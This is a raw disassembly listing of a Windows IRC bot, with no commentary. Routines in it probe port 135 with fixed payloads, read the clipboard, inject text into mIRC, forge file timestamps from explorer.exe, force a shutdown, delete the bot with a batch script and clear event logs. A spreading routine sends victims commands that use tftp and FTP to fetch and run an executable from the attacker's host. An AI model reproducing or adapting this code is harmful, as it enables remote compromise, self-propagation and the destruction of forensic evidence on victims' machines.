fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul ds:dbl_43C4C8
call __ftol
cmp esi, 3
jz short loc_41884E
cmp eax, 1
jnz loc_41893F
loc_41884E: ; CODE XREF: sub_418650+1F3�j
push 2
cdq
pop ecx
idiv ecx
cmp edx, 1
jnz short loc_418890
push edi ; Str
call _strlen
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp qword ptr [ebp-10h]
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul qword ptr [ebp-10h]
fmul ds:dbl_43C4C8
call __ftol
mov al, byte ptr a__3[eax] ; "-|`_\\{[]}"
mov [ebx], al
jmp short loc_4188AC
; ---------------------------------------------------------------------------
loc_418890: ; CODE XREF: sub_418650+207�j
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4B8
call __ftol
mov cl, 41h
sub cl, al
mov [ebx], cl
loc_4188AC: ; CODE XREF: sub_418650+23E�j
push 1
inc esi
pop ebx
mov [ebp+var_4], esi
mov [ebp+Count], ebx
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4B0
call __ftol
cmp esi, 3
jz short loc_4188D5
cmp eax, ebx
jnz short loc_41893F
loc_4188D5: ; CODE XREF: sub_418650+27F�j
push 2
pop ebx
cdq
mov ecx, ebx
idiv ecx
test edx, edx
jnz short loc_41891A
push edi ; Str
call _strlen
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp qword ptr [ebp-10h]
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul qword ptr [ebp-10h]
fmul ds:dbl_43C4C8
call __ftol
mov al, byte ptr a__3[eax] ; "-|`_\\{[]}"
mov [ebp+esi+Dst], al
jmp short loc_418938
; ---------------------------------------------------------------------------
loc_41891A: ; CODE XREF: sub_418650+28F�j
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4B8
call __ftol
mov cl, 41h
sub cl, al
mov [ebp+esi+Dst], cl
loc_418938: ; CODE XREF: sub_418650+2C8�j
inc esi
mov [ebp+Count], ebx
mov [ebp+var_4], esi
loc_41893F: ; CODE XREF: sub_418650+1C9�j
; sub_418650+1F8�j ...
cmp esi, 6
jge loc_4189C8
cmp esi, 5
jge short loc_418960
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4D0
jmp short loc_41897E
; ---------------------------------------------------------------------------
loc_418960: ; CODE XREF: sub_418650+2FB�j
call _rand
push 8
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
pop eax
sub eax, esi
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul ds:dbl_43C4C8
loc_41897E: ; CODE XREF: sub_418650+30E�j
call __ftol
test eax, eax
jnz short loc_4189A1
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4A8
call __ftol
mov cl, 30h
jmp short loc_4189BE
; ---------------------------------------------------------------------------
loc_4189A1: ; CODE XREF: sub_418650+335�j
cmp eax, 1
jnz short loc_4189C8
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4B8
call __ftol
mov cl, 41h
loc_4189BE: ; CODE XREF: sub_418650+34F�j
sub cl, al
mov [ebp+esi+Dst], cl
inc esi
mov [ebp+var_4], esi
loc_4189C8: ; CODE XREF: sub_418650+2F2�j
; sub_418650+354�j
cmp [ebp+Count], 2
jge short loc_418A48
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fimul [ebp+var_4]
fmul ds:dbl_43C4C8
call __ftol
cmp eax, 1
jnz short loc_418A48
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4A8
call __ftol
mov cl, 30h
sub cl, al
mov [ebp+esi+Dst], cl
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C4A0
call __ftol
cmp eax, 1
jnz short loc_418A48
cmp [ebp+Count], eax
jge short loc_418A48
call _rand
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul ds:dbl_43C498
call __ftol
mov cl, 30h
sub cl, al
mov [ebp+esi+var_2B], cl
loc_418A48: ; CODE XREF: sub_418650+1B1�j
; sub_418650+37C�j ...
lea eax, [ebp+Dst]
push 14h ; Count
push eax ; Source
push [ebp+Dest] ; Dest
call _strncpy
mov eax, [ebp+Dest]
add esp, 0Ch
pop edi
pop esi
pop ebx
leave
retn
sub_418650 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418A61(int,int,void *Buf2,size_t Size)
sub_418A61 proc near ; CODE XREF: .text:00418BBE�p
; .text:00418BE5�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Buf2 = dword ptr 10h
Size = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+Size]
test edi, edi
jle short loc_418A8F
loc_418A72: ; CODE XREF: sub_418A61+2C�j
push [ebp+Size] ; Size
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+Buf2] ; Buf2
push eax ; Buf1
call _memcmp
add esp, 0Ch
test eax, eax
jz short loc_418A95
inc esi
cmp esi, edi
jl short loc_418A72
loc_418A8F: ; CODE XREF: sub_418A61+F�j
xor al, al
loc_418A91: ; CODE XREF: sub_418A61+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_418A95: ; CODE XREF: sub_418A61+27�j
mov al, 1
jmp short loc_418A91
sub_418A61 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 2010h
call __alloca_probe
mov eax, [ebp+0Ch]
push esi
dec eax
push edi
jz short loc_418ADA
dec eax
jz short loc_418AB8
dec eax
loc_418AB2: ; CODE XREF: .text:00418AF0�j
xor eax, eax
loc_418AB4: ; CODE XREF: .text:00418AD8�j
; .text:00418C02�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_418AB8: ; CODE XREF: .text:00418AAF�j
push 3
push 1388h
push dword ptr [ebp+8]
call dword_4E3138 ; inet_addr
push eax
call sub_40C6E7
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
jmp short loc_418AB4
; ---------------------------------------------------------------------------
loc_418ADA: ; CODE XREF: .text:00418AAC�j
push 6
push 1
push 2
call dword_4E3178 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+0Ch], esi
jz short loc_418AB2
push ebx
xor ebx, ebx
push 10h
lea eax, [ebp-10h]
push ebx
push eax
call _memset
add esp, 0Ch
mov word ptr [ebp-10h], 2
push 87h
call dword_4E30F8 ; htons
push dword ptr [ebp+8]
mov [ebp-0Eh], ax
call sub_40AE55
pop ecx
mov [ebp-0Ch], eax
lea eax, [ebp-10h]
push 10h
push eax
push esi
call dword_4E30A0 ; connect
cmp eax, edi
jz loc_418BF6
push ebx
push 48h
push offset dword_44FC30
push esi
call dword_4E3148 ; send
cmp eax, edi
jz loc_418BF6
mov esi, 2000h
push ebx
lea eax, [ebp-2010h]
push esi
push eax
push dword ptr [ebp+0Ch]
call dword_4E3110 ; recv
cmp eax, edi
jz loc_418BF6
cmp byte ptr [ebp-200Eh], 0Ch
jnz short loc_418BF6
push ebx
push 18h
push offset dword_44FC7C
push dword ptr [ebp+0Ch]
call dword_4E3148 ; send
cmp eax, edi
jz short loc_418BF6
push ebx
lea eax, [ebp-2010h]
push esi
push eax
push dword ptr [ebp+0Ch]
call dword_4E3110 ; recv
mov esi, eax
cmp esi, edi
jz short loc_418BF6
cmp byte ptr [ebp-200Eh], 2
jnz short loc_418BF6
push 10h
push offset dword_44FC98
lea eax, [ebp-2010h]
push esi
push eax
call sub_418A61
add esp, 10h
test al, al
jz short loc_418BD6
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_418BF6
; ---------------------------------------------------------------------------
loc_418BD6: ; CODE XREF: .text:00418BC8�j
push 10h
push offset dword_44FCAC
lea eax, [ebp-2010h]
push esi
push eax
call sub_418A61
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_418BF6: ; CODE XREF: .text:00418B34�j
; .text:00418B4B�j ...
push dword ptr [ebp+0Ch]
call dword_4E3190 ; closesocket
mov eax, ebx
pop ebx
jmp loc_418AB4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418C07(char *Src,char *SubStr,char *Source)
sub_418C07 proc near ; CODE XREF: sub_401CC7+BD4�p
; sub_401CC7+C11�p ...
Src = dword ptr 8
SubStr = dword ptr 0Ch
Source = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+Src]
xor esi, esi
cmp edi, esi
jz short loc_418C92
mov eax, [ebp+SubStr]
cmp eax, esi
jz short loc_418C92
cmp [ebp+Source], esi
jz short loc_418C92
cmp byte ptr [eax], 0
jz short loc_418C92
push ebx
push edi ; Src
call __strdup
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_418C8D
push [ebp+SubStr] ; SubStr
push edi ; Str
call _strstr
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_418C86
sub eax, edi
push eax ; Count
push edi ; Source
push ebx ; Dest
call _strncpy
push [ebp+Source] ; Str
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call _strlen
push eax ; Count
push [ebp+Source] ; Source
push ebx ; Dest
call _strncat
push [ebp+SubStr] ; Str
call _strlen
add eax, esi
push eax ; Source
push ebx ; Dest
call _strcat
push ebx ; Source
push edi ; Dest
call _strcpy
add esp, 30h
mov esi, edi
loc_418C86: ; CODE XREF: sub_418C07+3C�j
push ebx ; Memory
call _free
pop ecx
loc_418C8D: ; CODE XREF: sub_418C07+2B�j
mov eax, esi
pop ebx
jmp short loc_418C94
; ---------------------------------------------------------------------------
loc_418C92: ; CODE XREF: sub_418C07+C�j
; sub_418C07+13�j ...
xor eax, eax
loc_418C94: ; CODE XREF: sub_418C07+89�j
pop edi
pop esi
pop ebp
retn
sub_418C07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418C98(char *Str,int)
sub_418C98 proc near ; CODE XREF: sub_401B4F+E9�p
; sub_410C7D+F4�p
Dst = dword ptr -7D0h
var_7CC = byte ptr -7CCh
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push 7D0h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
mov esi, [ebp+Str]
push esi ; Str
call _strlen
add esp, 10h
push 1
pop ebx
cmp eax, ebx
jge short loc_418CCE
or eax, 0FFFFFFFFh
jmp short loc_418D41
; ---------------------------------------------------------------------------
loc_418CCE: ; CODE XREF: sub_418C98+2F�j
xor ecx, ecx
mov [ebp+Dst], esi
test eax, eax
jle short loc_418CF0
loc_418CDA: ; CODE XREF: sub_418C98+56�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_418CE7
cmp dl, 0Dh
jnz short loc_418CEB
loc_418CE7: ; CODE XREF: sub_418C98+48�j
and byte ptr [ecx+esi], 0
loc_418CEB: ; CODE XREF: sub_418C98+4D�j
inc ecx
cmp ecx, eax
jl short loc_418CDA
loc_418CF0: ; CODE XREF: sub_418C98+40�j
xor edx, edx
push edi
test eax, eax
jle short loc_418D21
lea edi, [ebp+var_7CC]
loc_418CFD: ; CODE XREF: sub_418C98+87�j
cmp byte ptr [edx+esi], 0
jnz short loc_418D1C
cmp byte ptr [edx+esi+1], 0
lea ecx, [edx+esi+1]
jz short loc_418D1C
cmp ebx, 1F4h
jge short loc_418D21
mov [edi], ecx
inc ebx
add edi, 4
loc_418D1C: ; CODE XREF: sub_418C98+69�j
; sub_418C98+74�j
inc edx
cmp edx, eax
jl short loc_418CFD
loc_418D21: ; CODE XREF: sub_418C98+5D�j
; sub_418C98+7C�j
cmp [ebp+arg_4], 0
pop edi
jz short loc_418D3F
lea eax, [ebp+Dst]
push 7D0h ; Size
push eax ; Src
push [ebp+arg_4] ; Dst
call _memcpy
add esp, 0Ch
loc_418D3F: ; CODE XREF: sub_418C98+8E�j
mov eax, ebx
loc_418D41: ; CODE XREF: sub_418C98+34�j
pop esi
pop ebx
leave
retn
sub_418C98 endp
; =============== S U B R O U T I N E =======================================
sub_418D45 proc near ; CODE XREF: sub_418D9F+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
xor esi, esi
rep stosd
lea edi, [eax-1]
test edi, edi
jl short loc_418D7E
push ebx
mov ebx, edi
loc_418D62: ; CODE XREF: sub_418D45+36�j
mov eax, [esp+0Ch+arg_0]
mov al, [esi+eax]
push eax
call sub_418D81
pop ecx
inc esi
mov ecx, [esp+0Ch+arg_8]
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_418D62
pop ebx
loc_418D7E: ; CODE XREF: sub_418D45+18�j
pop edi
pop esi
retn
sub_418D45 endp
; =============== S U B R O U T I N E =======================================
sub_418D81 proc near ; CODE XREF: sub_418D45+25�p
; sub_418D9F+6B�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax ; C
call _tolower ; _tolower
cmp al, 61h
pop ecx
jl short loc_418D9C
cmp al, 7Ah
jg short loc_418D9C
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_418D9C: ; CODE XREF: sub_418D81+E�j
; sub_418D81+12�j
xor eax, eax
retn
sub_418D81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418D9F(char *Str,int)
sub_418D9F proc near ; CODE XREF: .text:00415D48�p
; .text:00415DCD�p ...
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call __alloca_probe
push ebx
push esi
push edi
push [ebp+Str] ; Str
call _strlen
push [ebp+arg_4] ; Str
mov [ebp+var_4], eax
call _strlen
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_418D45
add esp, 14h
dec esi
mov edi, esi
loc_418DDD: ; CODE XREF: sub_418D9F+B6�j
test esi, esi
jle short loc_418E5B
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax ; C
call _tolower ; _tolower
mov ebx, eax
mov eax, [ebp+Str]
movsx eax, byte ptr [edi+eax]
push eax ; C
call _tolower ; _tolower
pop ecx
cmp eax, ebx
pop ecx
jz short loc_418E53
loc_418E03: ; CODE XREF: sub_418D9F+B2�j
mov ebx, [ebp+Str]
mov al, [edi+ebx]
push eax
call sub_418D81
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_418E24
mov eax, ecx
loc_418E24: ; CODE XREF: sub_418D9F+81�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_418E57
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax ; C
call _tolower ; _tolower
mov edx, eax
movsx eax, byte ptr [edi+ebx]
push eax ; C
mov [ebp+var_8], edx
call _tolower ; _tolower
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_418E03
loc_418E53: ; CODE XREF: sub_418D9F+62�j
dec edi
dec esi
jmp short loc_418DDD
; ---------------------------------------------------------------------------
loc_418E57: ; CODE XREF: sub_418D9F+8A�j
xor eax, eax
jmp short loc_418E60
; ---------------------------------------------------------------------------
loc_418E5B: ; CODE XREF: sub_418D9F+40�j
mov eax, [ebp+Str]
add eax, edi
loc_418E60: ; CODE XREF: sub_418D9F+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_418D9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418E65 proc near ; CODE XREF: sub_401CC7+6824�p
; sub_401CC7+7954�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov esi, eax
push 0
lea eax, [ebp+var_100]
push 100h
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_4F542C ; FormatMessageA
lea eax, [ebp+var_100]
loc_418E9E: ; CODE XREF: sub_418E65+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_418EAA
cmp cl, 9
jnz short loc_418EAD
loc_418EAA: ; CODE XREF: sub_418E65+3E�j
inc eax
jmp short loc_418E9E
; ---------------------------------------------------------------------------
loc_418EAD: ; CODE XREF: sub_418E65+43�j
; sub_418E65+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_418EC7
mov cl, [eax]
cmp cl, 2Eh
jz short loc_418EAD
cmp cl, 21h
jl short loc_418EAD
loc_418EC7: ; CODE XREF: sub_418E65+54�j
lea eax, [ebp+var_100]
push esi
push eax
mov esi, offset byte_4F2994
push [ebp+arg_0]
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h ; Count
push esi ; Dest
call __snprintf
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_418E65 endp
; =============== S U B R O U T I N E =======================================
sub_418EEF proc near ; CODE XREF: sub_401CC7+24BB�p
push esi
push 0
call dword_4E30C8 ; OpenClipboard
test eax, eax
jz short loc_418F26
push 1
call dword_4E30E8 ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_418F26
push edi
push esi
call ds:dword_4F5434 ; GlobalLock
push esi
mov edi, eax
call ds:dword_4F5430 ; GlobalUnlock
call dword_4E314C ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_418F26: ; CODE XREF: sub_418EEF+B�j
; sub_418EEF+19�j
xor eax, eax
pop esi
retn
sub_418EEF endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_418F2A(char *Format)
sub_418F2A proc near ; CODE XREF: sub_401CC7+770A�p
Format = dword ptr 4
push ebp
push esi
xor esi, esi
push esi
push offset aMirc_2 ; "mIRC"
call dword_4E3104 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_418FAA
push ebx
push edi
push offset aMirc_3 ; "mIRC"
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:dword_4F5440 ; CreateFileMappingA
push esi
push esi
mov edi, eax
push esi
push 0F001Fh
push edi
call ds:dword_4F543C ; MapViewOfFile
push [esp+10h+Format] ; Format
mov ebx, eax
push ebx ; Dest
call _sprintf
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_4E3154 ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call dword_4E3154 ; SendMessageA
push ebx
call ds:dword_4F5438 ; UnmapViewOfFile
push edi
call ds:dword_4F533C ; CloseHandle
push 1
pop eax
pop edi
pop ebx
jmp short loc_418FAC
; ---------------------------------------------------------------------------
loc_418FAA: ; CODE XREF: sub_418F2A+14�j
xor eax, eax
loc_418FAC: ; CODE XREF: sub_418F2A+7E�j
pop esi
pop ebp
retn
sub_418F2A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418FAF proc near ; CODE XREF: WinMain(x,x,x,x)+212�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_4E31B4 ; SearchPathA
test eax, eax
jz short loc_41904E
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, ds:dword_4F53C0
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_41904E
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_4F5448 ; GetFileTime
push ebx
mov ebx, ds:dword_4F533C
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_41904E
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_4F5444 ; SetFileTime
push esi
call ebx ; CloseHandle
loc_41904E: ; CODE XREF: sub_418FAF+2A�j
; sub_418FAF+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_418FAF endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 454h
push esi
xor esi, esi
push 10h
lea eax, [ebp-10h]
push esi
push eax
call _memset
push 44h
lea eax, [ebp-54h]
push esi
push eax
call _memset
add esp, 18h
lea eax, [ebp-454h]
mov dword ptr [ebp-54h], 44h
mov dword ptr [ebp-28h], 1
push dword ptr [ebp+0Ch]
mov [ebp-24h], si
push dword ptr [ebp+8]
push offset aSS_11 ; "%s %s"
push 400h
push eax
call __snprintf
add esp, 14h
lea eax, [ebp-10h]
push eax
lea eax, [ebp-54h]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp-454h]
push esi
push eax
push dword ptr [ebp+8]
call ds:dword_4F5340 ; CreateProcessA
neg eax
sbb eax, eax
pop esi
and eax, [ebp-8]
leave
retn
; =============== S U B R O U T I N E =======================================
sub_4190D4 proc near ; CODE XREF: sub_401CC7+16A2�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_41A51E
pop ecx
pop ecx
push 50005h
push 6
call dword_4E3038 ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_4190D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4190F6 proc near ; CODE XREF: sub_401CC7+2745�p
; sub_416F62+472�p
Str = byte ptr -764h
var_364 = byte ptr -364h
Dest = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
Dst = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp dword_43F090, esi
push edi
jz short loc_41911A
cmp dword_4E31C8, esi
jnz short loc_41911A
push esi ; Str
call sub_401000
pop ecx
loc_41911A: ; CODE XREF: sub_4190F6+13�j
; sub_4190F6+1B�j
call sub_40B91F
lea eax, [ebp+Str]
push eax
push 400h
call ds:dword_4F5384 ; GetTempPathA
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dest]
push offset aSdel_bat ; "%sdel.bat"
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dest]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call ds:dword_4F53C0 ; CreateFileA
mov edi, eax
cmp edi, esi
jbe loc_41927A
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+Str]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push edi
call ds:dword_4F53B4 ; WriteFile
push edi
call ds:dword_4F533C ; CloseHandle
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_58]
pop edi
push edi ; Size
push esi ; Val
push eax ; Dst
call _memset
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
lea eax, [ebp+var_15C]
push edi
push eax
push esi
mov [ebp+var_4C], offset dword_4F2B98
mov [ebp+var_2C], 1
mov [ebp+var_28], si
call ds:dword_4F5370 ; GetModuleHandleA
push eax
call ds:dword_4F5344 ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call ds:dword_4F536C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_419222
lea eax, [ebp+var_15C]
push 80h
push eax
call ds:dword_4F5368 ; SetFileAttributesA
loc_419222: ; CODE XREF: sub_4190F6+118�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+var_364]
push edi
push eax
lea eax, [ebp+Str]
push eax
call ds:dword_4F544C ; ExpandEnvironmentStringsA
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
lea eax, [ebp+var_364]
push esi
push eax
push esi
call ds:dword_4F5340 ; CreateProcessA
loc_41927A: ; CODE XREF: sub_4190F6+72�j
pop edi
pop esi
leave
retn
sub_4190F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41927E(int,char *Str,int,int,int)
sub_41927E proc near ; CODE XREF: sub_401CC7+72DB�p
Dest = byte ptr -294h
Dst = dword ptr -94h
var_84 = dword ptr -84h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 294h
push edi
xor edi, edi
push 94h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
mov [ebp+Dst], 94h
push eax
call ds:dword_4F539C ; GetVersionExA
cmp [ebp+var_84], 2
jnz short loc_419314
push [ebp+arg_10]
push [ebp+arg_C]
call dword_4E3078 ; OpenEventLogA
push edi
push eax
call dword_4E3088 ; ClearEventLogA
test eax, eax
jz short loc_419306
push [ebp+arg_10]
push offset asc_44FD78 ; "-"
loc_4192DF: ; CODE XREF: sub_41927E+94�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 20h
jmp short loc_41933E
; ---------------------------------------------------------------------------
loc_419306: ; CODE XREF: sub_41927E+57�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44FD94
jmp short loc_4192DF
; ---------------------------------------------------------------------------
loc_419314: ; CODE XREF: sub_41927E+3F�j
lea eax, [ebp+Dest]
push offset asc_44FDBC ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 1Ch
loc_41933E: ; CODE XREF: sub_41927E+86�j
pop edi
leave
retn
sub_41927E endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp-10h]
push edi
push eax
call _memset
add esp, 0Ch
lea eax, [ebp+0Ch]
mov word ptr [ebp-10h], 2
push eax
call dword_4E3138 ; inet_addr
push dword ptr [ebp+0C4h]
mov [ebp-0Ch], eax
call dword_4E30F8 ; htons
push edi
push 1
push 2
mov [ebp-0Eh], ax
call dword_4E3178 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+0C4h], esi
jz loc_419444
lea eax, [ebp-10h]
push 10h
push eax
push esi
call dword_4E30A0 ; connect
cmp eax, 0FFFFFFFFh
jz loc_419444
mov ebx, 400h
push edi
lea eax, [ebp-5A0h]
push ebx
push eax
push esi
call dword_4E3110 ; recv
mov esi, offset Str ; "nlzhxmpyrjsyle.exe"
push esi
push esi
push dword ptr [ebp+8]
call sub_40AF71
pop ecx
mov edi, 190h
push eax
push offset aTftpISGetSS ; "tftp -i %s get %s &%s\r\n"
lea eax, [ebp-1A0h]
push edi
push eax
call __snprintf
movzx eax, word ptr dword_4E2E18
add esp, 18h
push esi
push esi
push eax
push dword ptr [ebp+8]
call sub_40AF71
pop ecx
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp-1A0h]
push edi
push eax
call __snprintf
add esp, 1Ch
lea eax, [ebp-1A0h]
push 0
push eax
call _strlen
pop ecx
push eax
lea eax, [ebp-1A0h]
push eax
push dword ptr [ebp+0C4h]
call dword_4E3148 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_419448
loc_419444: ; CODE XREF: .text:00419397�j
; .text:004193AD�j
xor al, al
jmp short loc_41946C
; ---------------------------------------------------------------------------
loc_419448: ; CODE XREF: .text:00419442�j
push 0
lea eax, [ebp-5A0h]
push ebx
push eax
push dword ptr [ebp+0C4h]
call dword_4E3110 ; recv
push dword ptr [ebp+0C4h]
call dword_4E3190 ; closesocket
mov al, 1
loc_41946C: ; CODE XREF: .text:00419446�j
pop edi
pop esi
pop ebx
leave
